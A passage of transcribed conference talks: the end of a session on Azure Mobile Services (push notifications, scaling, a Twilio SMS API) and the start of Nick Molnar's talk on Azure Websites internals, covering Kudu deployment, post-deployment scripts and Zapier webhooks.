hell? Oh yeah, that's because I forgot to put in the endpoints. I knew that would help.
Well done. Okay, so that brings up my next point about what you actually should do when you set this up: you manage the connection information. The hub is called ndcoslohub, and we want to use that here, and then the listen endpoint, which is just going to be here. Put that in over here — oh yeah, I've got extra quotes there, thank you. I'll go back here. All right, F5 this now. This is actually a great way to show you how not to develop — don't ever come up and try to do live coding. Error loading items: access is denied. Of course access is denied, because I forgot to change the table permissions. So this really shows you the development environment — it actually shows you how to debug. Yeah, that's how most of us do it as well. Yeah, that worked. Did any of you see Anthony's talk on SOLID for CSS? He was talking about spaghetti code in JavaScript, and I was thinking: mostly, spaghetti code in JavaScript happens because "it works, don't touch it." I don't actually know why it works now, but it does work, and I don't want to break it. So we'll just set the permissions to anybody with the application key and click save. All right, so 20 minutes — we're fine. I'm going to go on and talk about disaster recovery in a bit. Yes — there we go: registration successful. So when I save a record here — come on, save — it should send me a notification. And there it goes. Now, that is a very simple notification. What I've done here is change the code on the insert script so that when it inserts, it sends a notification. It uses require('azure') — this is Node.js, so it's just var azure = require('azure') — and then azure.createNotificationHubService, with the same endpoints I put in before.
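Put together, the insert script just described looks roughly like this. The (item, user, request) signature and the wns.sendToastText01 call are the shapes the platform and the azure Node module expose, as quoted in the talk; here the hub is injected and stubbed so the sketch runs standalone, and the hub name and toast text are my own.

```javascript
// Sketch of the server-side insert script: save the row, respond to the caller,
// then fire a WNS toast through the notification hub. The stubs stand in for the
// platform-supplied request object and the real hub.
function makeInsertScript(hub) {
  return function insert(item, user, request) {
    request.execute({
      success: function () {
        request.respond(); // answer the client first, then push
        hub.wns.sendToastText01(null, { text1: 'New item: ' + item.text },
          function (err) { if (err) console.error(err); });
      }
    });
  };
}

// Stubs standing in for the platform objects.
var sent = [];
var stubHub = {
  wns: { sendToastText01: function (tags, payload, cb) { sent.push(payload); cb(null); } }
};
var stubRequest = {
  execute: function (opts) { opts.success(); },
  respond: function () {}
};

makeInsertScript(stubHub)({ text: 'hello' }, null, stubRequest);
console.log(sent[0].text1); // "New item: hello"
```

Responding before pushing is deliberate: the client shouldn't wait on the push service's latency just to know its insert succeeded.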
You give it the hub and the endpoint, and then just say wns.sendToastText01 to do this. We can actually use the custom API to test this as well — I've got a notifyallusers API here, which will let me do a test notification if I want, and if you run it, it'll actually send a notification. But to test it, what you can also do is go into your notification hub, click debug, and do a random broadcast — send it to, for example, Windows. I can select a notification type, just a toast, and it gives me a test message here, or I can just click send. So it should broadcast to this device here — I hope; a random broadcast may not hit every device. Yes. So let's try a send: send test message, send. It sends a toast notification. And probably now what will happen is I'll get about four notifications in one go, because notifications are best effort — they're not fully reliable, which is a bit of an annoying thing. But if I do a random broadcast, or send to a tag, it'll just send it down. What you can do further with push notifications: if we go back to our mobile service and into the API, we can, for example, drive the notification hubs from here. Now, if I bring up my notifications here — see if I've got this — "Hello from mobile services," scheduled. Yes, I have a sample notification. If I go into my scheduler, I've got a sample push set up here in the script, and it uses a more advanced call on the hub. It's still the same hub, but it lets me send, for example, sendToastImageAndText01. It'll do a run-once, and I get a "hello from NDC Oslo" complete with badge and the whole lot. So I can send specific formats.
This uses Windows Notification Services, with image1src pointing at an image on my CDN, and then sends the push notification onwards. This is where I can go generic: if I use, for example, notificationHubService.send(null, message), that message will be pushed irrespective of platform — if there's an iOS device connected, it would receive it too. The WNS call up here would not send to iOS, because iOS doesn't support it. For that you'd use notificationHubService.apns.send, where you put in the correct attributes an iOS device requires, and it broadcasts to all connected iOS devices. Notification hubs also support tags, whereby a user can sign up for a specific subset — like news broadcasts. If we look at Twitter: I only want notifications for DMs and actual interactions; I don't want a notification for every single tweet. You can say, okay, subscribe to that tag, and then when you broadcast with that tag, it sends only to the devices registered with that particular tag. The same goes if I want to use APNs or Google Cloud Messaging. Now, that is push notifications. As you can see, you just use var azure = require('azure'), get the notification hub service, and it works from there. Right, okay — so the demo's recovered a bit, and we'll see what else we can do. I hope to God this next one works, because it's failed so many times. If you're going to scale your application: what happens when things go viral?
How do you react? You've developed the new Flappy Bird — the very addictive game. Your application gets picked up by 100 people on the first day. That's fine; my servers can handle it. It's picked up by a million people the next morning, and by 100 million the next afternoon. How do you scale from 100 people to 100 million people in 24 hours without the power of the cloud? What mobile services does is provide you with a back end that will expand when you need it. When we design applications, we're all hunting for the one that will generate enough cash — but if we can't keep up with its demand, it will fail. If your users cannot connect to the service and it keeps timing out, well, people are fickle — 15-minute attention span — and they're gone. However, if your application is going superbly well and people can still access it, it generates viral word of mouth and continues on. The more you grow, the more the Azure application can expand with you. So if we look at how to scale, it's quite simple: it's under the mobile service again, and you just click Scale. On the free tier you get something like 500,000 calls, and on the standard tier you get 15 million calls per unit, up to a certain number of units. You can also add units and expand your application to react to load. As we know, one of the selling points of cloud is the elasticity of the service: when I use up my current resources, I expand; when I don't need those resources anymore, I just return them. That's why I'm saying: if you have a back end that needs to scale very quickly, you can do this. Right now, out of the box, you get 20 megs of database for free.
But if you need more data, you've got to move to a bigger SQL database, of course. Right — I'm going to talk a little bit about disaster recovery, because I think it's something we should talk about, and about the custom API, which is also part of mobile services. First off, the custom API: it allows you to create endpoints that can be called over GET or POST, RESTfully. So in this case, where I've set up Send SMS, I've set the permissions — I can say anyone can do a GET request and it will send an SMS, or anyone with an application key, or only authenticated users, things like that. What I've done is set up an integration with Twilio. Does anyone know how to pronounce that? Twilio. Sorry, guys. And in Kudu — which is the back end for Azure Mobile Services and also the back end for websites — you can install Twilio support using npm install twilio, and that then lets you call the Twilio service. Have you all seen Twilio? It lets you send SMS and make voice calls programmatically. So say you want to implement a service where — I know I'm going to send push notifications, but I also want to send SMS to my users. On Azure Mobile Services, what you do is install Twilio, set whatever permissions you want on the API, and then your script here is just exports.get: for the GET verb, I'm going to create a new Twilio REST client and send an SMS from this number to myself. And that's it. To call it, it's then the mobile service URL, slash api, slash sendsms. So this just opens, returns null — and it has actually sent me a text message, quite happily. But it also shows how we're going to do logging.
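A sketch of that custom API, including the console.error logging the next bit relies on: exports.get is the shape a mobile services custom API uses, and sendSms mirrors the old twilio-node client call from that era — treat the exact signature as an assumption. The client is injected and stubbed here so the sketch runs without credentials, and the phone numbers are placeholders.

```javascript
// Sketch of the sendsms custom API: a GET hits Twilio, then the result (success
// SID or failure) is logged and turned into an HTTP response. The stub Twilio
// client and stub response object make this a dry run.
function makeSendSmsApi(twilioClient) {
  return {
    get: function (request, response) {
      twilioClient.sendSms(
        { to: '+4700000000', from: '+15550000000', body: 'Hello from NDC Oslo' },
        function (err, message) {
          if (err) {
            console.error('SMS failed:', err.message);
            return response.send(500, { error: 'sms failed' });
          }
          console.error('Success, SID:', message.sid); // logged, as described in the talk
          response.send(200, null);
        });
    }
  };
}

// Stubs for a dry run.
var stubTwilio = { sendSms: function (opts, cb) { cb(null, { sid: 'SM123', body: opts.body }); } };
var lastStatus;
var stubResponse = { send: function (status, body) { lastStatus = status; } };

makeSendSmsApi(stubTwilio).get({}, stubResponse);
console.log(lastStatus); // 200
```

Injecting the Twilio client rather than constructing it inside the handler is just for testability in this sketch; on the real service you'd new it up with your account SID and auth token.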
Because when we go back in here, it says console.error: success, the SID for this SMS is the following. So when I go back into my logs, I can actually see it: the message was sent on this day, the SID for it was such-and-such, the notifications were successful. That's my logging function. We recommend that you only log errors — don't log warnings, don't log information — because logs fill up very quickly and you have to truncate them every so often. Very simple, but the idea that you can export this log back out and read it with something like New Relic, to keep an eye on your application, makes the integration much simpler. Back here with Kudu — Kudu is the back end. You can actually just see what's running: the app settings, for example. It's much easier if I do it in Chrome, because I've got a JSON viewer there. Okay, any questions while I'm waiting for this? Done so far? Yes, sir? Do notifications work with websites? Yes — I think you can do push notifications to HTML5, as far as I understand. If you have a website, can you hook it up to the mobile services back end and use the Azure authentication? Oh yes, you can — very good question. For example, using the custom API, I can create an endpoint with, say, a POST request, and I have a mobile services client with the authentication token. Your website says POST, do this, sends the value; the service receives that data and then pushes to all connected devices for you. It's just running over REST, so it's quite simple that way. So if we look at the app settings here, we can actually see what's behind all this — it gives you the whole thing.
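Going back to that audience question about driving pushes from a website: the custom-API POST endpoint the answer describes could be sketched like this. The application-key check and header name are my own illustration — on a real mobile service you'd set the API's permission to "anyone with the application key" and let the platform validate it — and the hub is stubbed.

```javascript
// Sketch of a custom-API POST a website can call, which then broadcasts to all
// connected devices. The key check is hand-rolled here only so the sketch is
// self-contained; the real platform enforces permissions for you.
function makeBroadcastApi(hub, appKey) {
  return {
    post: function (request, response) {
      if (request.headers['x-zumo-application'] !== appKey) {
        return response.send(401, { error: 'bad application key' });
      }
      hub.send(null, request.body.message); // null tag = every connected device
      response.send(200, { queued: true });
    }
  };
}

// Stubs for a dry run.
var pushed = [];
var hub = { send: function (tags, msg) { pushed.push(msg); } };
var lastStatus;
var res = { send: function (status) { lastStatus = status; } };

var api = makeBroadcastApi(hub, 'secret-key');
api.post({ headers: { 'x-zumo-application': 'secret-key' }, body: { message: 'hi all' } }, res);
console.log(lastStatus, pushed[0]); // 200 "hi all"
```

So the website never talks to WNS, APNs, or GCM directly — it just POSTs over REST, and the mobile service fans out the push.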
Those app settings, by the way, are the stuff you don't want to let out into the world. Right, we're nearing the end of things — so that was the custom API. This was where I was talking to one of the guys who did it with Twilio: just be careful that, again, you don't get fully reliable delivery on the free account. So if you are using this type of thing, make sure you have a paid account for it. Right — closing time. If you are continuing your Azure learning journey, please catch Nick Molnar's talk on Azure websites. It links directly into this, because it's running on the same kind of platform, and you'll be able to integrate it with mobile services. Also try to get up and see Troy Hunt's talk — it's in Room 7 today. You've learned how to do mobile services; now learn how to secure your web applications while you're doing it, because if you're integrating with anything like this, you have to think about it securely. Now, you should really go off and start creating applications, because — as I've probably not quite effectively shown, sorry about that — it is easy. It's one of those things that, as you get into it, becomes much simpler, and it takes away a lot of the pain points we've had as developers: how to do notification services, how to integrate our databases into an application and share them across all devices, how to have a dynamic back end so you can just build your front end and let the database look the way it needs to behind it. Any more questions? Anything else? Going once, going twice, gone. Thank you very much. Thank you.
This session is geared at giving a comprehensive overview of Windows Azure Mobile Services and how you can use it in your apps. We will look quickly at the services before diving in and building an application that uses them.
10.5446/50624 (DOI)
Alright. Good afternoon everybody. Welcome to room number one: Azure Website Secrets Exposed. My name is Nick Molnar; I'm from New York City. I decided to do something really smart yesterday — I got a horrible cold — so I'm not usually as sultry as this, and I've been relying on cough drops to get through the day. It's okay, though, because I met some people on the internet here in Oslo and they gave me pills with labeling I don't understand, because it's not in my language, but they tell me it should make me feel better, and so far so good. But if I kind of float away, you'll know why. I've been a web developer for a little over 15 years now. I created an open source project with my buddy Anthony called Glimpse that you may or may not have heard of. How many people have heard of or seen Glimpse? Okay, cool — a good number of you, that's great. We won't be talking about that at all today. The Glimpse project is sponsored by a company named Redgate that's based in England, and thanks to their sponsorship I get to work full time on open source — my baby — in addition to speaking to great developers like you at conferences around the world. I've been honored to become an MVP for ASP.NET, and I'm also an Azure Insider. Azure has become a bigger part of my world as my day-to-day progresses, because even though I see myself as a web developer, I was always just the software guy. I would let somebody else go into the closet in the back of the office — they were the server guy. They set up IIS for me, they set up SQL Server for me; I never really dealt with that. Then the whole DevOps movement started, and while I'll sometimes dabble in ops, I feel myself firmly being the dev part of DevOps. And Azure, particularly Azure websites, has begun to change the way I think about myself: from being just a developer to becoming a little bit more of a dev op.
So if you have any questions after the conference or just want to chat and be online with me, I tweet at nickmd23. So Azure, Azure is huge. It's this monolithic universal thing that we have applied one word which until a few years ago was just a color to me. Azure, as my coworkers like to pronounce it. I know lots of people who are MVPs in Azure and they know lots about different subsections of Azure but I've not met anybody who knows everything about everything. It's just too large now. You can't kind of get a grasp on the whole thing. So what I've decided to do is focus particularly on Azure websites and with that in this talk, I want to really dig into some of the nooks and crannies. Some of the things that maybe aren't as visible to you if you've watched other talks or you play around on the portal. So just a quick show of hands. How many people here have actually deployed an Azure website before? Okay, great. And I'm assuming the rest of you are interested in this technology and that's great. So Azure websites actually aren't that special. At the end of the day, it's infrastructure that you may know. I never knew because I let the guy deal with it in the closet at the end of the hall. I let the ops guy deal with it. But I've been forced to kind of think about it a little bit more. So for those of you who haven't seen it, let me jump in really quick and show you what I'm talking about with Azure websites. So Microsoft Azure, basically everything you do starts in the portal. The portal is this place where you can make new websites, make new databases, make new whatever the thing is that you're trying to create and monitor them and configure them, etc. So this is the new, brand new Microsoft portal. It's in preview. It's at a different URL than maybe you're used to going to. It's at portal.azure.com. And it's pretty fancy. You can click in here and it has nice little alien graphics. It has this concept of things called blades. 
I can click on this tour and you'll see this new blade pop up, and as I work it continues horizontally. But here's the problem with preview: it's beta software and it's really slow right now — that's my opinion. So to save a bunch of time for everybody, because this talk takes much longer in the preview portal, I'm going to switch over to the old portal, which you may have seen before, and that looks like this. So I'm going to really quickly create a website for those of you who haven't seen it, and then we're going to dig into some new stuff. This is actually my personal account, where I'm running a couple of different websites that I work on on the side. The Glimpse website is an Azure website as well, but it's on a different subscription, so you're not seeing it here. But I have a site called signatory.io, which is for managing contributor license agreements against GitHub, and something else called Signatory, which is a pet project of mine. So I'm going to say I want to create a new compute website — custom create — and we'll just go through the wizard. Let's call this NDC demo. I want to create a new SQL database, and the code I'm deploying is already looking for a connection string called DataContext, so I'm going to make that the default connection string name. Great. The code I want to use is already on my GitHub account, so I'm going to check that box so we can publish from source control. Great. Next. Sorry about the water, guys — I'm going to need to moisten my throat. For the database, I don't really like the random name it gives, so let's just call it DB; it's a little easier to find. We'll create it on a new server; I'll create a login and a password. Great. Okay, now I get to pick where I want to pull my code from. Let's say GitHub. Next. That pop-up window you saw was Azure going out to my GitHub account, authenticating me.
I'm already logged into GitHub, so I came back right away, and now I get to pick a repository that I want to use. I'm going to use a repository I have called full-stack-web-perf. This is the actual demo code for my talk tomorrow — the second talk of the day — where I'll be taking a look at this specific website and how to improve its performance on the network, on the server, in JavaScript, in CSS. Top to bottom, we're going to make this website scream. But we'll just use the demo app for what we're looking at in Azure today. So I press complete, and just like that a website is being created. You can see it here being created — Azure usually does these kinds of things pretty quickly, within a matter of seconds. There we go. And now I can come in, and you can see if I go to Deployments, a deployment is happening. What's going on in the background: it's fetching changes — going to GitHub and cloning, downloading all of the code I have on GitHub so it can get it up and running on the web server. While it's doing that, I'll turn on a couple of configuration changes that I like to have. I like to have logging enabled, so I'm going to turn on application logging — this is the logging that comes from my app, my Trace.WriteLines that I put in my code — and turn it up to verbose; I like to see all of that kind of stuff. I'm also going to turn on web server logging — the logging that IIS gives you, the W3C standard log file format. I'll hit save, and let's see if we're done deploying yet. Okay, great, we are. I'll browse to it. So a database was created, a website was created, and the connection string was automatically put into the config file for me. At this point, that website is being jitted for the first time. I'm using Entity Framework migrations in this website.
So all of the data is getting populated into the database on this first request, and when it's all done, we should see it. Now, I'm American, which means a couple of things. I'm fat — a little bit; self-deprecating humor, a little bit. Okay. I love baseball. I'm in New York, but I'm not a Yankees fan — I'm a Miami Marlins fan. So what I decided to do was make a demo application all about baseball. But nobody in Scandinavia cares about baseball, so instead I've made a website about clowns, essentially. But they're baseball clowns: these are the mascots of minor league baseball. There are 160 minor league baseball teams, and this website shows off their mascots. So if I wanted to, I could go look at the Texas minor league and see all of the mascots available there. I can look at the winners of the Mascot Mania contest that happens every year — all the mascots compete and do stupid things, like throw pies in each other's faces — and you can see the winners here. There are some really great ones, like this guy here, Ballapeño: he mixes together jalapeños and baseball, and how can you go wrong with Ballapeño? And there are other guys, like Roscoe the P. Ray Rooster — not a guy I would want to see in a dark alley. I have no clue what wrestling and baseball have to do with each other, but we're American — why not some gratuitous violence? So this is my website, and just like that, in the span of a couple of minutes, I have this database and this website up and running. That's great — if you haven't seen it, that's Azure websites. So let's go ahead and dig into what Azure websites really is. Now, if you've been around the block with Azure a little, or you've sat in a talk or two, you may have heard of something called a web role. Websites is not that. Web role, website: two completely different things, unfortunately named so similarly. Web roles are still around.
And I've put up a comparison of some of the things you can do in web roles that you can't do in websites, and vice versa. To me, a web role feels more appropriate when you have something really custom, really enterprise — maybe a legacy code base that you're trying to move into the cloud — because you get elevated startup scripts, so you can install things on the machine that is running that website, and you can have a dedicated IP, virtual networks, things like this. The biggest flaw with web roles, to me, is that deployment can take eight to fifteen minutes. That's just too long for me as a developer, and I have to do a little more management of the box — and I'm the dev half of DevOps, so I'm kind of uncomfortable with that. Websites, on the other hand, suit me really well. Everything runs through my source control, and that's a dev-friendly thing — it's ops tacked on in the way that a dev wants to do it. That means we're basically using continuous deployment. Deployment is very fast: yes, that probably took about 30 seconds, but from a cold start that's not too bad, as in the example I just gave. And we have some other options that aren't available with web roles, like content backup, rollbacks, and WebJobs — all of these are interesting. But if we stop and think about what an Azure website really is, it's not that different from what the ops guy I let hang out in the back closet used to manage. It's just like the hardware you've had in the past: a copy of Windows running somewhere with .NET and IIS on it. That's kind of good news, because the ops guy can still be quite comfortable. But there's this extra layer on top, completely open sourced and available on GitHub, called Kudu. And so I have the Scott Gu Octocat here representing Kudu. Now, just to prove that an Azure website is nothing special, I'm going to use the ops manager's friend here: IIS Manager.
And I'm going to make a change to the website we just deployed in the cloud. So I connect to a site: I type in NDC demo, go to port 443, and give it a name of NDC demo — that's arbitrary. My username, my password. Authentication happens. Great. I can name the connection. Finish. So now what I'm looking at is the standard IIS interface that I would use in my enterprise, but connected to the Azure cloud, on that website I just created. Let me prove it to you. There's a whole bunch of things we can see. I can look at application settings, and you can see some of the standard ASP.NET settings that get added to your web.config — web pages version, unobtrusive JavaScript enabled, et cetera. I'm going to go into HTTP Redirect, turn on redirects for my site, and point it to something ubiquitous like google.com. Let me apply that change, and now when I come back and refresh, you'll see that my website redirected me to Google. Let me turn that back off, because nobody wants to look at Google the rest of the time. Apply that, and now if I go back, I can refresh; my site will need to re-jit and everything because I restarted the web server, but it will come back up here in a second. I show all of that just to ask: what really is websites? Well, it's standard IIS, standard .NET, standard Windows. But this Kudu layer — that's the part I haven't touched. Let's really dig into what that is. You'll notice I have a diagram here showing Kudu going off to all of these different source control providers: Bitbucket on the top, then GitHub, then Dropbox — and I don't understand why we use the word Dropbox when we talk about source control providers, but I've been guilty of using Dropbox as source control, so maybe it makes a little sense. And then CodePlex, because everybody uses CodePlex. So, Kudu is named after this animal.
It's a real animal. It kind of looks like a goat that I wouldn't want to mess with, but he's there. It's interesting. It's a service that is different than most services we interact with today. Today, typically when I think of a service, my connotation is a multi-tenant service. There is one service that I interact with that might manipulate many different things, but everybody is connecting to the same service. Kudu is a single-tenant service, which means that for every website you create, an instance of the Kudu service is also created to go along with it. It's like a buddy site. These two things go together. And Kudu and that website are linked in a couple of interesting ways. As of right now — this might not always be true, but as of right now — Kudu runs in the exact same process as the website. It runs in the same sandbox as the website, and that means a few different things for you as a user. One, it means that Kudu has access to do anything that your website has access to do. Two, it means that the only thing that Kudu can screw up on that box that you're in is your website. So you can do things in Kudu that break your website. Three, it means that all of your quotas between your website and Kudu are shared. So CPU usage, memory usage, hard drive usage — all of that stuff that you're doing with Kudu also counts against your website. So you kind of pay for it. So let's take a timeline look at what Kudu does. I basically like to think of Kudu as a very low-level continuous integration server. And I say that because it reminds me of seven, eight, nine, ten years ago when I was working on CruiseControl.NET, if you guys ever played around with that. Basically, CruiseControl.NET would watch some source control provider; the source code changed because you committed or pushed or whatever it was called in whatever flavor of source control you used back then.
Whenever that happened, it would pull down those changes and then run some script. So the first thing that we see that Kudu does is it connects to the source control provider and it acquires your source when you change it. The next thing it does is it builds the code that it's received. Now Kudu works with lots of different flavors. I'm a .NET guy, so I'll mostly be talking about .NET, but it also works with Node and PHP and Java and Python. So if your programming environment du jour doesn't require a build, like Node or PHP, it just doesn't build. But for .NET there is a build step, so there is a build. And then the next thing it does is it copies the assets into the wwwroot, the place that I serve content out of on the open internet, whether that's the binaries that have been compiled or just the source for interpreted languages. And then finally, it does some post-actions. It says, hey, I'm done doing the main thing that I do — and there's two flavors of that. There's post-actions, which you see first. These are scripts that you can execute. And the second thing that it does is it uses — I'll use the word technology loosely — webhooks, which are basically the opposite of web APIs. So let me show you what that looks like. First, let's talk about these post-actions. Just a general note: everything that I do today is going to be stuff that you can't do through the portal, or mostly can't do through the tools that Microsoft gives you. That's why these are the secrets. So the things that I'm telling you today are available and they're supported, but sometimes they're a little rough around the edges, and a lot of it has been me kind of dancing through trying to figure things out, or talking to people that work on the Azure team to get this kind of information.
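The timeline he walks through — acquire, build, copy, post-actions — can be sketched as a naive pipeline. This is purely illustrative, not Kudu's code; each stage is a stand-in echo, wired together so the ordering and fail-fast behavior are explicit:

```shell
#!/bin/sh
# Naive sketch of the Kudu deployment timeline described above.
# Stand-in stages only; real Kudu does the actual work.
acquire_source()  { echo "1. acquire source from the provider"; }
build_code()      { echo "2. build (skipped for no-build stacks like Node/PHP)"; }
copy_to_wwwroot() { echo "3. copy built assets into wwwroot"; }
post_actions()    { echo "4. run post-deployment scripts, then fire webhooks"; }

deploy() {
  # && chains stop the pipeline as soon as a stage fails
  acquire_source && build_code && copy_to_wwwroot && post_actions
}

deploy
```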
You may see in the future that some of these secrets will show up in the portal and it won't be much of a secret anymore, because there will be a button that you click and it does the thing that I'm showing you how to do now. But maybe not. So this post thing is an example of that. So let's go ahead and just copy this little thing and cheat a second here. What I'm going to do is go back into the portal, and on the dashboard I get a URL to an FTPS, a secure FTP, location. And a lot of people don't realize this, but Windows Explorer is an FTP client. So I just opened up Windows Explorer. I pasted that FTP address. I hit go. It's going to authenticate me. So once again I'll type in my password, and my username was already there. And we are connecting to the site. Cool. I am now just FTPed into that box that I earlier connected to with Internet Information Services Manager, IIS Manager. So I'm connected to that same thing via FTP. If I go into the site, I can see all of my content here in the wwwroot. I can start deleting things and changing things and you're going to see that live on the website. There's a bunch of other files and folders in here, though, that are not my website, like this diagnostics, repository. This is actually where all my Git code lives, and you can see my Git attributes and whatnot. But what I'm going to do is go into deployments. Kudu stores all of the information about your deployments on disk. So that's kind of cool. But inside of tools I'm going to create a new directory. So new folder, and we're going to call it PostDeploymentActions. Cool. And inside of there I can add any number of scripts that I want to — batch files or cmd files. So let me go ahead and just create a really simple one so you guys get the point. I'm going to say echo hello from post.bat. Let me save this as post.bat. Not nat, bat. Okay, great. And then let me grab that file. Where did I stick it? I stuck it on my desktop. Users, Nick, desktop. Post.bat.
I'm going to copy this file and just — oh, let me copy it. Sorry guys. Copy the file, and I'm going to drag it into this FTP window here. Cool. So I just uploaded a file through Windows Explorer over FTP to my website. Now, any time a deployment happens — and instead of re-downloading all the code I'll just redeploy what we already have deployed — that script will execute. So I'm going to click on this deployment. I'll say redeploy. Yes. This should happen much faster this time because there's no source code to download. There's been no changes on the repo. So you can see it's deploying. Cool. We're done. If I come through here and look at the logs, you will see that I have executed that file and it's saying hello from post.bat. So obviously I just echoed. That's not really anything interesting. But in this scenario, any post steps you would make after deploying something, you could do. So priming caches, pushing content to a CDN provider, anything like that you can all do in these scripts. You can have multiple ones, so you can have one for each different task you're doing. And Kudu will run them in order, the same order that you see them in Windows Explorer. And if one of them errors out — returns a non-zero exit code — it will just stop there and the rest of them don't run. But that's kind of cool, a nice little hidden trick that you can do to do things after the build has happened. So that's this post-action, the one on the top. But there's also this webhook option, which is really handy for guys like me who are web developers. I'm not super comfortable getting down into scripting batch files or whatnot, but web programming I'm all about. So let's take a look at how the webhooks work. What I'm going to do is go to this website called Zapier. Zapier is similar to If This Then That, ifttt.com, if you're familiar with that website. I like to think of it as programming my mother could do. It's very simple, like a draggy-droppy, point-and-click kind of thing.
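Those post-deployment semantics — scripts run in name order, and the first non-zero exit code stops the rest — can be sketched in a few lines. This is a POSIX-shell illustration of the described behavior; Kudu itself runs .bat/.cmd files on Windows, and the folder and script names here are made up:

```shell
#!/bin/sh
# Illustrates the described semantics: run every script in the folder
# in name order, and stop at the first one that exits non-zero.
run_post_deployment_actions() {
  for script in "$1"/*.sh; do
    [ -e "$script" ] || return 0          # nothing to run
    sh "$script" || {
      echo "post-deployment action failed: $script" >&2
      return 1                            # remaining scripts are skipped
    }
  done
}

# Demo: two throwaway action scripts (glob expansion is sorted,
# so 01-* runs before 02-*)
dir=$(mktemp -d)
printf 'echo hello from 01-first\n'  > "$dir/01-first.sh"
printf 'echo hello from 02-second\n' > "$dir/02-second.sh"
run_post_deployment_actions "$dir"
```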
So I'm going to make a zap. And the reason why I'm using Zapier is because the Azure websites team has worked with Zapier to have a nice experience specifically for websites. So when I create a new zap, which is basically an if-then block of code, I can choose what my "if" is going to be — my trigger. And I'll do a search for Azure. And you can see I have Azure websites. So when this happens: either when a web job is run or a site is deployed — that's the one I care about. So when a site is deployed, then what do I want to do? Now, I use this all the time for my side project, which I call Glutly. And what I have Glutly do is send me a text message on my phone every time a deployment happens. So that looks something like this. This is literally a screenshot from my phone. You can see there that my last deployment was successful. I have a URL so I can click and go right to that spot. And you can see I fixed the bug resulting from multiple restaurants being added to a database. I'm American and I don't have a SIM card that works here, so we're going to do something a little bit different, but it proves the point of how easy it is to plug and play with something like Zapier. So instead we're going to go to Twitter, because I do have an internet connection here. And we're going to send out a tweet any time a deployment happens. So that's what I'm going to do. So when there's a new website deployment, I'm going to create a tweet. Like I said, my mom can do this. Now we need to tell Zapier about my website. And so if I say connect to an Azure websites account, you'll notice here that it's asking me for a deployment trigger URL. Well, what's that, you ask? If you go into the portal and you go over here to configure, there is a field that has just that URL. So I'm going to copy it. I'm going to come back to Zapier and I'm going to paste it. And then we'll give a name to this connection. So this is going to be Azure websites. This is for the NDC demo. Great. Continue.
And so you can see here the account is working. Zapier and my website are now communicating. And that communication is happening because the Kudu web service is there. I never see it, but that's what's going on there. I can press continue. I'll make this go to my Twitter account, NickMD23. Continue. I can add filtering so I don't always do this. We'll just skip that step because I want to prove the point to you guys. Continue. And so we'll say deployment happened. And I can put in variables. So if I say insert fields, Zapier now goes out to that web service that Kudu is hosting and it will show me all of the fields that I have available in a moment. Hang tight. Can take a minute, apparently. There we go. So you can see I can use the message, the status, the author, the deployer, all of these different things. We'll just go ahead and put the message into the tweet. Continue. And click the button to test. That's fine. And we're good to go. Oh, I need to name this zap. So we'll also name this NDC demo. Cool. Turn the zap on. And now, any time I do a deployment, the website will tell Zapier, and Zapier will see that any time a deployment happens, I should be doing a tweet. And you can see that this thing is on: Azure websites to Zapier. So what I'll do here is come back to my website. I'll look at my deployments. We will redeploy, just like we did before. And while that happens, we'll go over to my Twitter stream to see the tweet come through, because the tweet will come from me. I'm a big foodie, as I already mentioned. So you might notice that last night I went out to dinner here in Oslo and we decided to have whale meat. This is not something I'm accustomed to in the States. It made me think: I bet Twitter never fails in Oslo, because everybody knows the famous fail whale — and you guys would eat it. It's like Twitter said, we're not going to fail in Oslo, or they'll eat our beloved mascot. So that deployment should have finished. It has.
Let me go ahead and refresh my Twitter stream. All right. We're still waiting for Zapier to send the tweet through. There we go. Deployment happened: adding tracing for Azure demo. So just like that, a tweet has happened, and it's told everybody who cares about the website that there's a new version. I'm going to go ahead and delete that tweet so my followers don't get irritated with me. So that is using the webhooks that Kudu allows you to use. Now, all of these steps in the pipeline are extremely configurable, and this is something I find that nobody really knows about. So let me show you the configuration points. All of them. So the first thing is you can change the way that Kudu interacts with your source control provider using app settings. I've shown you some of the app settings here. There are more available in the documentation, links to which are provided at the end of the talk. So in the app settings, which I will show you really quickly in the portal: if I go to configure, here are my app settings. These are just key-value pairs. If I use the right named key, as shown on this PowerPoint, in these app settings, I can change things like the path into which Kudu will clone all my code, or I can say not to use a repository at all, which is what happens automatically with Dropbox, or the target path. So you can do really interesting things like in-place deployments. So you can have the code copy right from the repository into the wwwroot. So if you just want to deploy your assets already built — maybe you handle the building — you can just flip a couple of switches here and it will grab it and just stick it right in wwwroot and you're serving it. The next thing up that we have here is this .ini file, which is a little archaic, but I guess I would prefer that over XML. There are all these other settings that we can use. So one of them, you'll see, is this SCM_POST_DEPLOYMENT_ACTIONS_PATH setting.
So I just had to FTP into the site and go into this tools directory under deployments to put that post.bat file there. Well, that's kind of a pain in the butt. What if I just wanted that to be in my source control? That's fine. I could have put that script right in the source control, as long as I go and change the setting and tell Kudu: when you're done, don't run the scripts from where you normally get them, run them from this path that I've given you. So you can override basically everything. And then finally, kind of the mack daddy, blow-everything-up-and-change-it option: this .cmd file. Essentially everything that Kudu is doing, you can stop and say, hey Kudu, will you write down your logic for me into a file so I can change it? And so you can do that. Let me show you what that looks like. I am here at the command line. I've already installed the cross-platform Azure CLI tools and I'm looking at full stack web perf. That is my repository, my directory where I have all of this code for this mascot website. So I'm going to say azure site deploymentscript, and that takes in some parameters. This is going to fail. Basically, that's the command where I tell Azure: hey, persist all of your logic. So what I need to do is tell it first of all that it is an ASP.NET web application. I need to point to my project file, so that's in the directory structure. Actually, let me show you the directory structure. So you can see that I have a folder called demo. I have my PowerPoint slides for this talk. I have a demo script, et cetera, et cetera. So I'm going to say that it's an ASP.NET web application that lives in demo slash minor league baseball web. Minor league baseball web, that's my .csproj file. The other thing that I need to do is say that there is a solution file at demo/demo.sln. If I run this — it already exists, that's okay, I'm going to overwrite it for this — it has just gone and written two files to that directory.
